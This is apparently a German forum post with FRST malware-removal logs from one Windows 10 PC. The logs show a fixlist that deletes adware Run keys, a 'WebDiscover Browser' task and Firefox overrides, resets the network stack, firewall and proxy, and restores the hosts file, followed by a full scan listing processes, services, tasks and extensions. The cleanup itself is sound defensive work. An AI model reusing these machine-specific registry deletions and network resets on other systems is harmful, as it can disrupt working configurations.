DeleteValue: HKU\S-1-5-21-3451750051-380284315-2914928687-1002\Environment|aedffcbccbfe
DeleteValue: HKU\S-1-5-21-3451750051-380284315-2914928687-1002\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run|aedffcbccbfe
CMD: type "C:\Users\Tom\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Mounten.bat"
Task: {A9488763-4F15-4C35-96F7-11315EA3F955} - System32\Tasks\WebDiscover Browser Update Task => C:\Users\Vincent\AppData\Local\WebDiscoverBrowser\4.28.2\browser.exe <==== ACHTUNG
C:\Users\Vincent\AppData\Local\WebDiscoverBrowser
FF HomepageOverride: Mozilla\Firefox\Profiles\4eks1494.default -> Disabled: web@fd9b3d8a-1178-45ab-92a8-a172d0b7c32e
FF NewTabOverride: Mozilla\Firefox\Profiles\4eks1494.default -> Disabled: {d04b0b40-3dab-4f0b-97a6-04ec3eddbfb0}
CMD: ipconfig /flushdns
CMD: netsh winsock reset
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state ON
CMD: Bitsadmin /Reset /Allusers
powershell: Set-MpPreference -PUAProtection Enabled
Hosts:
RemoveProxy:
SystemRestore: On
EmptyTemp:

*****************

Prozesse erfolgreich geschlossen.
"HKU\S-1-5-21-3451750051-380284315-2914928687-1002\Software\Microsoft\Windows\CurrentVersion\Run\\aedffcbccbfe" => erfolgreich entfernt
HKU\S-1-5-21-3451750051-380284315-2914928687-1002\Software\aedffcbccbfe => erfolgreich entfernt
HKU\S-1-5-21-3451750051-380284315-2914928687-1002\Environment\aedffcbccbfe => nicht gefunden
"HKU\S-1-5-21-3451750051-380284315-2914928687-1002\Environment\\aedffcbccbfe" => erfolgreich entfernt
"HKU\S-1-5-21-3451750051-380284315-2914928687-1002\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\aedffcbccbfe" => nicht gefunden

========= type "C:\Users\Tom\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Mounten.bat" =========


========= Ende von CMD: =========

"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{A9488763-4F15-4C35-96F7-11315EA3F955}" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A9488763-4F15-4C35-96F7-11315EA3F955}" => erfolgreich entfernt
C:\WINDOWS\System32\Tasks\WebDiscover Browser Update Task => erfolgreich verschoben
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\WebDiscover Browser Update Task" => erfolgreich entfernt
"C:\Users\Vincent\AppData\Local\WebDiscoverBrowser" => nicht gefunden
"Firefox HomepageOverride (web@fd9b3d8a-1178-45ab-92a8-a172d0b7c32e) " => erfolgreich entfernt
"Firefox NewTabOverride ({d04b0b40-3dab-4f0b-97a6-04ec3eddbfb0}) " => erfolgreich entfernt

========= ipconfig /flushdns =========


Windows-IP-Konfiguration

Der DNS-Aufl”sungscache wurde geleert.

========= Ende 2 CMD: =========


========= netsh winsock reset =========


Der Winsock-Katalog wurde zurckgesetzt.
Sie mssen den Computer neu starten, um den Vorgang abzuschlieáen.


========= Ende 2 CMD: =========


========= netsh advfirewall reset =========

OK.


========= Ende 2 CMD: =========


========= netsh advfirewall set allprofiles state ON =========

OK.


========= Ende 2 CMD: =========


========= Bitsadmin /Reset /Allusers =========


BITSADMIN version 3.0
BITS administration utility.
(C) Copyright Microsoft Corp.

0 out of 0 jobs canceled.

========= Ende 2 CMD: =========


========= Set-MpPreference -PUAProtection Enabled =========


========= Ende 2 Powershell: =========

C:\Windows\System32\Drivers\etc\hosts => erfolgreich verschoben
Hosts erfolgreich wiederhergestellt.

========= RemoveProxy: =========

"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => erfolgreich entfernt
"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => erfolgreich entfernt
"HKU\S-1-5-21-3451750051-380284315-2914928687-1002\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => erfolgreich entfernt
"HKU\S-1-5-21-3451750051-380284315-2914928687-1002\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => erfolgreich entfernt


========= Ende 2 RemoveProxy: =========

SystemRestore: On => abgeschlossen

=========== EmptyTemp: ==========

BITS transfer queue => 10248192 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 107414553 B
Java, Flash, Steam htmlcache => 18431069 B
Windows/system/drivers => 132162770 B
Edge => 2207744 B
Chrome => 0 B
Firefox => 1074110402 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 1052167 B
NetworkService => 1090095 B
Tom_Admin => 1713962 B
Tom => 27315668 B
Vincent => 318227299 B

RecycleBin => 127597 B
EmptyTemp: => 1.6 GB temporäre Dateien entfernt.

================================


Das System musste neu gestartet werden.

==== Ende 2 Fixlog 22:44:46 ====
Code:
Farbar Recovery Scan Tool (x64) Version: 02-12-2020
durchgeführt von Tom (02-12-2020 22:49:01)
Gestartet von C:\Users\Tom\Desktop
Start-Modus: Normal

================== Datei-Suche: "SearchAll: aedffcbccbfe" =============

Datei:
========

Ordner:
========

Registry:
========


====== Ende von Suche ======

FRST Logfile:
Code:
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 02-12-2020
durchgeführt von Tom (Administrator) auf DESKTOP-HRMFF6U (02-12-2020 22:55:01)
Gestartet von C:\Users\Tom\Desktop
Geladene Profile: Tom
Platform: Windows 10 Pro Version 2004 19041.630 (X64) Sprache: Deutsch (Deutschland)
Standard-Browser: FF
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

() [Datei ist nicht signiert] C:\Program Files (x86)\Drakonia Configurator\hid.exe
(Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(Audible Inc) C:\Program Files\WindowsApps\AudibleInc.AudibleforWindowsPhone_10.5.66.0_x64__xns73kv1ymhp2\AudibleRT.WindowsPhone.exe
(Electronic Arts, Inc. -> Electronic Arts) C:\Program Files (x86)\Origin\OriginWebHelperService.exe
(Geek Software GmbH -> Geek Software GmbH) C:\Program Files (x86)\PDF24\pdf24.exe
(Hauppauge Computer Works Inc. -> Hauppauge Computer Works) [Datei ist nicht signiert] D:\WinTV8\TVServer\CaptureGenPCI.exe
(Hauppauge Computer Works Inc. -> Hauppauge Computer Works) [Datei ist nicht signiert] D:\WinTV8\TVServer\HauppaugeTVServer.exe
(Intel(R) Embedded Subsystems and IP Blocks Group -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\dal.inf_amd64_ffc75848a6342fdf\jhi_service.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.WindowsStore_12011.1001.1.0_x64__8wekyb3d8bbwe\WinStore.App.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe <6>
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe <2>
(Plex, Inc -> Plex, Inc.) D:\Plex Media Server\Plex Update Service.exe
(Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Star Finanz - Software Entwicklung und Vertriebs GmbH -> Star Finanz-Software Entwicklung und Vertriebs GmbH) C:\Program Files (x86)\StarMoney 11\ouservice\StarMoneyOnlineUpdate.exe
(Star Finanz - Software Entwicklung und Vertriebs GmbH -> Star Finanz-Software Entwicklung und Vertriebs GmbH) C:\Program Files (x86)\StarMoney 12 Basic\ouservice\StarMoneyOnlineUpdate.exe
(Synology Inc. -> ) [Datei ist nicht signiert] C:\Program Files (x86)\Synology\Assistant\UsbClientService.exe
(TVG Telefon- und Verzeichnisverlag GmbH & Co. KG -> ) C:\Program Files (x86)\TVG\OnlineUpdate\OnlineUpdateSvc.exe
(Wondershare Technology Co.,Ltd -> Wondershare) C:\Program Files (x86)\Wondershare\WAF3\3.0.0.308\WsAppService3.exe
(Wondershare Technology Co.,Ltd -> Wondershare) D:\Program Files (x86)\Wondershare\drfone\Library\DriverInstaller\DriverInstall.exe

==================== Registry (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8899592 2016-08-18] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKLM-x32\...\Run: [GamingMouse] => C:\Program Files (x86)\Drakonia Configurator\hid.exe [248832 2013-10-29] () [Datei ist nicht signiert]
HKLM-x32\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe [2133728 2017-09-12] (Wondershare Technology Co.,Ltd -> Wondershare)
HKLM-x32\...\Run: [PDFPrint] => C:\Program Files (x86)\PDF24\pdf24.exe [483976 2020-08-13] (Geek Software GmbH -> Geek Software GmbH)
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Beschränkung <==== ACHTUNG
HKU\S-1-5-19\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518656 2019-12-07] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-20\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518656 2019-12-07] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-21-3451750051-380284315-2914928687-1002\...\Run: [EADM] => C:\Program Files (x86)\Origin\Origin.exe [3145504 2020-11-23] (Electronic Arts, Inc. -> Electronic Arts)
HKU\S-1-5-21-3451750051-380284315-2914928687-1002\...\Run: [Lync] => C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe [23923520 2020-11-15] (Microsoft Corporation -> Microsoft Corporation)
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{73FA19D0-2D75-11D2-995D-00C04F98BBC9}] ->
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\AutoStart IR.lnk [2017-12-10]
ShortcutTarget: AutoStart IR.lnk -> D:\WinTV8\Ir.exe (Hauppauge Computer Works Inc. -> Hauppauge Computer Works) [Datei ist nicht signiert]
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\WinTV Recording Status.lnk [2017-12-10]
ShortcutTarget: WinTV Recording Status.lnk -> D:\WinTV8\WinTV8\WinTVTray.exe (Hauppauge Computer Works Inc. -> Hauppauge Computer Works, Inc.) [Datei ist nicht signiert]
Startup: C:\Users\Tom\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Mounten.bat [2020-06-10] ()

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) ============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {04CA3909-D69D-43A5-99CA-E4A7DB045E6B} - System32\Tasks\NvTmRepCR2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [950128 2018-10-11] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {0EFEBAAC-576E-4762-8997-7B0E494946BA} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-04-20] (Google Inc -> Google Inc.)
Task: {1017B9C3-45B8-4597-B14C-533C4DD0962B} - System32\Tasks\NvTmRepCR1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [950128 2018-10-11] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {21B90862-E5A8-4513-A6E7-B3318C907E16} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [22939528 2020-11-04] (Microsoft Corporation -> Microsoft Corporation)
Task: {301D3EF3-4629-4E7B-A141-56376012B2D2} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [855408 2018-10-11] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {58C39010-E634-4932-82D7-6908617A530B} - System32\Tasks\klcp_update => D:\Program Files (x86)\K-Lite Codec Pack\Tools\CodecTweakTool.exe [1179648 2019-05-04] () [Datei ist nicht signiert]
Task: {6650BCCE-E32F-4AA3-8646-656E362AD7AD} - System32\Tasks\Opera GX scheduled Autoupdate 1581624516 => C:\Users\Vincent\AppData\Local\Programs\Opera GX\launcher.exe [1654808 2020-11-09] (Opera Software AS -> Opera Software)
Task: {6AEB12E4-EBBE-49F9-BF52-BA918C8FF8D7} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [855408 2018-10-11] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {6EC9D36C-56A9-49EF-80C8-E873D54B79E3} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [3982744 2020-11-15] (Microsoft Corporation -> Microsoft Corporation)
Task: {7B618AD2-A374-4448-9922-2761F033DD0E} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [3982744 2020-11-15] (Microsoft Corporation -> Microsoft Corporation)
Task: {89D3A3AF-AA6C-4D9C-B5A9-E8BF31EB742D} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [950128 2018-10-11] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {8AE68F17-25F4-4A4B-9F41-2BA2C9A23871} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [695664 2018-10-11] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {8F1D618A-832E-4B10-8203-742394F9E334} - System32\Tasks\Microsoft\Office\Office Feature Updates => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [117600 2020-11-15] (Microsoft Corporation -> Microsoft Corporation)
Task: {93034433-CC5F-470F-A985-B27BCA73C2CE} - System32\Tasks\GarminUpdaterTask => C:\Program Files (x86)\Garmin\Express SelfUpdater\ExpressSelfUpdater.exe [40432 2020-09-21] (Garmin International, Inc. -> )
Task: {94CBBC10-AAB9-4C2C-A6B3-12E2A6895D7B} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1349200 2020-11-03] (Adobe Inc. -> Adobe Inc.)
Task: {A34D82CB-2F6B-44C9-807F-C038448DD629} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-04-20] (Google Inc -> Google Inc.)
Task: {AB419D69-ABC8-46B7-8635-373A19889BA4} - System32\Tasks\NvTmRepCR3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [950128 2018-10-11] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {BF858A89-C229-4458-B2F5-558835BA4A14} - System32\Tasks\Microsoft\Office\Office Feature Updates Logon => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [117600 2020-11-15] (Microsoft Corporation -> Microsoft Corporation)
Task: {DB6AEEDB-4855-4BEB-9E27-295F36EF6FF0} - System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\default-browser-agent.exe [670928 2020-11-24] (Mozilla Corporation -> Mozilla Foundation)
Task: {DE716A61-2033-4009-AB31-EB3368A9D735} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [22939528 2020-11-04] (Microsoft Corporation -> Microsoft Corporation)
Task: {E6A8E65B-E786-46B7-8EE4-6BBF1BB5548B} - System32\Tasks\Intel PTT EK Recertification => C:\WINDOWS\System32\DriverStore\FileRepository\iclsclient.inf_amd64_75ffca5eec865b4b\lib\IntelPTTEKRecertification.exe [918288 2020-04-22] (Intel(R) Trust Services -> Intel(R) Corporation)

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)

Task: C:\WINDOWS\Tasks\Intel PTT EK Recertification.job => C:\WINDOWS\System32\DriverStore\FileRepository\iclsclient.inf_amd64_75ffca5eec865b4b\lib\IntelPTTEKRecertification.exe

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Tcpip\Parameters: [DhcpNameServer] 192.168.178.1
Tcpip\..\Interfaces\{63218f78-6517-4416-a1f6-e54ff6d4ebb1}: [DhcpNameServer] 192.168.42.129
Tcpip\..\Interfaces\{8614a304-0d06-47f8-ae57-178008927bf3}: [DhcpNameServer] 192.168.178.1
Tcpip\..\Interfaces\{e7f632ab-1108-4f8c-ac4e-4975ffc27554}: [DhcpNameServer] 192.168.42.129

Edge:
======
Edge DefaultProfile: Default
Edge Profile: C:\Users\Tom\AppData\Local\Microsoft\Edge\User Data\Default [2020-11-28]
Edge DownloadDir: H:\Download
Edge StartupUrls: Default -> "hxxp://startpage.de/"
Edge DefaultSearchURL: Default -> hxxp://startpage.de
Edge DefaultSearchKeyword: Default -> startpage

FireFox:
========
FF DefaultProfile: 4eks1494.default
FF ProfilePath: C:\Users\Tom\AppData\Roaming\Mozilla\Firefox\Profiles\4eks1494.default [2020-12-02]
FF DownloadDir: H:\Download
FF Homepage: Mozilla\Firefox\Profiles\4eks1494.default -> hxxps://www.startpage.com/do/mypage.pl?prfe=67d6f7efcd45238dc5da976ba89cf2c1761002405484af240c1c89932309a9bc682f42f8e95b43a819e717eb408e8de7
FF Notifications: Mozilla\Firefox\Profiles\4eks1494.default -> hxxps://www.alibaba.com; hxxps://support.gearbest.com
FF NewTabOverride: Mozilla\Firefox\Profiles\4eks1494.default -> Disabled: web@fd9b3d8a-1178-45ab-92a8-a172d0b7c32e
FF NewTabOverride: Mozilla\Firefox\Profiles\4eks1494.default -> Enabled: {d04b0b40-3dab-4f0b-97a6-04ec3eddbfb0}
FF NewTabOverride: Mozilla\Firefox\Profiles\4eks1494.default -> Enabled: {20fc2e06-e3e4-4b2b-812b-ab431220cada}
FF NewTabOverride: Mozilla\Firefox\Profiles\4eks1494.default -> Enabled: wikipedia@search.mozilla.org
FF NewTabOverride: Mozilla\Firefox\Profiles\4eks1494.default -> Enabled: leo_ende_de@search.mozilla.org
FF NewTabOverride: Mozilla\Firefox\Profiles\4eks1494.default -> Enabled: ecosia@search.mozilla.org
FF NewTabOverride: Mozilla\Firefox\Profiles\4eks1494.default -> Enabled: ebay@search.mozilla.org
FF NewTabOverride: Mozilla\Firefox\Profiles\4eks1494.default -> Enabled: ddg@search.mozilla.org
FF NewTabOverride: Mozilla\Firefox\Profiles\4eks1494.default -> Enabled: bing@search.mozilla.org
FF NewTabOverride: Mozilla\Firefox\Profiles\4eks1494.default -> Enabled: amazon@search.mozilla.org
FF NewTabOverride: Mozilla\Firefox\Profiles\4eks1494.default -> Enabled: google@search.mozilla.org
FF NewTabOverride: Mozilla\Firefox\Profiles\4eks1494.default -> Disabled: {d04b0b40-3dab-4f0b-97a6-04ec3eddbfb0}
FF Extension: (convert2mp3.net Online Video Converter) - C:\Users\Tom\AppData\Roaming\Mozilla\Firefox\Profiles\4eks1494.default\Extensions\info@convert2mp3.net.xpi [2018-02-19]
FF Extension: (Jetzt Konvertieren) - C:\Users\Tom\AppData\Roaming\Mozilla\Firefox\Profiles\4eks1494.default\Extensions\web@fd9b3d8a-1178-45ab-92a8-a172d0b7c32e.xpi [2019-07-16] [UpdateUrl:hxxps://d3qg9vtfkj5yig.cloudfront.net/WebExtensions/Updates/update.json]
FF Extension: (Startpage.com — Datenschutz-Suchmaschine) - C:\Users\Tom\AppData\Roaming\Mozilla\Firefox\Profiles\4eks1494.default\Extensions\{20fc2e06-e3e4-4b2b-812b-ab431220cada}.xpi [2019-10-12]
FF Extension: (Deaktivierungs-Add-on von Google Analytics) - C:\Users\Tom\AppData\Roaming\Mozilla\Firefox\Profiles\4eks1494.default\Extensions\{6d96bb5e-1175-4ebf-8ab5-5f56f1c79f65}.xpi [2020-04-16] [UpdateUrl:hxxps://tools.google.com/service/update2/ff?guid=%ITEM_ID%&version=%ITEM_VERSION%&application=%APP_ID%&appversion=%APP_VERSION%]
FF Extension: (Video DownloadHelper) - C:\Users\Tom\AppData\Roaming\Mozilla\Firefox\Profiles\4eks1494.default\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2020-03-31]
FF Extension: (Ecosia – Die Suchmaschine, die Bäume pflanzt) - C:\Users\Tom\AppData\Roaming\Mozilla\Firefox\Profiles\4eks1494.default\Extensions\{d04b0b40-3dab-4f0b-97a6-04ec3eddbfb0}.xpi [2019-09-08]
FF HKLM\...\Firefox\Extensions: [{9ea472d6-41d7-49db-bb40-1c8306a23129}] - C:\Program Files (x86)\twengoo\ff\twengoo-1.0.0-fx.xpi
FF Extension: (Twengoo) - C:\Program Files (x86)\twengoo\ff\twengoo-1.0.0-fx.xpi [2019-09-22]
FF HKLM-x32\...\Firefox\Extensions: [{9ea472d6-41d7-49db-bb40-1c8306a23129}] - C:\Program Files (x86)\twengoo\ff\twengoo-1.0.0-fx.xpi
FF Plugin: @java.com/DTPlugin,version=13.0.2.0 -> C:\Program Files\Java\jre-10.0.2\bin\dtplugin\npDeployJava1.dll [2020-06-27] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=13.0.2.0 -> C:\Program Files\Java\jre-10.0.2\bin\plugin2\npjp2.dll [2020-06-27] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\Office16\NPSPWRAP.DLL [Keine Datei]
FF Plugin: @videolan.org/vlc,version=2.2.8 -> D:\VLC\npvlc.dll [2020-06-04] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.10 -> D:\VLC\npvlc.dll [2020-06-04] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.11 -> D:\VLC\npvlc.dll [2020-06-04] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.3 -> D:\VLC\npvlc.dll [2020-06-04] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.6 -> D:\VLC\npvlc.dll [2020-06-04] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.7.1 -> D:\VLC\npvlc.dll [2020-06-04] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.8 -> D:\VLC\npvlc.dll [2020-06-04] (VideoLAN -> VideoLAN)
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.cpdf -> d:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [Keine Datei]
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.xdp -> d:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [Keine Datei]
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.xfdf -> d:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [Keine Datei]
FF Plugin-x32: @java.com/DTPlugin,version=11.251.2 -> D:\Java\2_51\bin\dtplugin\npDeployJava1.dll [2020-05-01] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.251.2 -> D:\Java\2_51\bin\plugin2\npjp2.dll [2020-05-01] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2020-09-18] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2020-09-18] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [Keine Datei]
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [Keine Datei]
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2020-11-19] (Adobe Inc. -> Adobe Systems Inc.)

==================== Dienste (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [170056 2020-11-03] (Adobe Inc. -> Adobe Inc.)
S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [8567960 2020-03-24] (BattlEye Innovations e.K. -> )
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [9057136 2020-11-04] (Microsoft Corporation -> Microsoft Corporation)
S3 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [784512 2020-03-14] (EasyAntiCheat Oy -> EasyAntiCheat Ltd)
S3 GameforgeClientService; C:\Program Files (x86)\GameforgeClient\gfservice.exe [562848 2020-08-06] (Gameforge 4D GmbH -> )
R2 HauppaugeTVServer; d:\WinTV8\TVServer\HauppaugeTVServer.exe [586536 2017-06-08] (Hauppauge Computer Works Inc. -> Hauppauge Computer Works) [Datei ist nicht signiert]
S2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe [7269976 2020-12-02] (Malwarebytes Inc -> Malwarebytes)
S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2523448 2020-11-23] (Electronic Arts, Inc. -> Electronic Arts)
R2 Origin Web Helper Service; C:\Program Files (x86)\Origin\OriginWebHelperService.exe [3478336 2020-11-23] (Electronic Arts, Inc. -> Electronic Arts)
R2 PDF24; C:\Program Files (x86)\PDF24\pdf24.exe [483976 2020-08-13] (Geek Software GmbH -> Geek Software GmbH)
R2 PlexUpdateService; D:\Plex Media Server\Plex Update Service.exe [2209256 2018-02-15] (Plex, Inc -> Plex, Inc.)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [5101992 2020-11-11] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 StarMoney 11 OnlineUpdate; C:\Program Files (x86)\StarMoney 11\ouservice\StarMoneyOnlineUpdate.exe [750296 2019-10-28] (Star Finanz - Software Entwicklung und Vertriebs GmbH -> Star Finanz-Software Entwicklung und Vertriebs GmbH)
R2 StarMoney 12 Basic OnlineUpdate; C:\Program Files (x86)\StarMoney 12 Basic\ouservice\StarMoneyOnlineUpdate.exe [762160 2020-10-22] (Star Finanz - Software Entwicklung und Vertriebs GmbH -> Star Finanz-Software Entwicklung und Vertriebs GmbH)
R2 TVGOnlineUpdateSvc; C:\Program Files (x86)\TVG\OnlineUpdate\OnlineUpdateSvc.exe [398128 2010-12-14] (TVG Telefon- und Verzeichnisverlag GmbH & Co. KG -> )
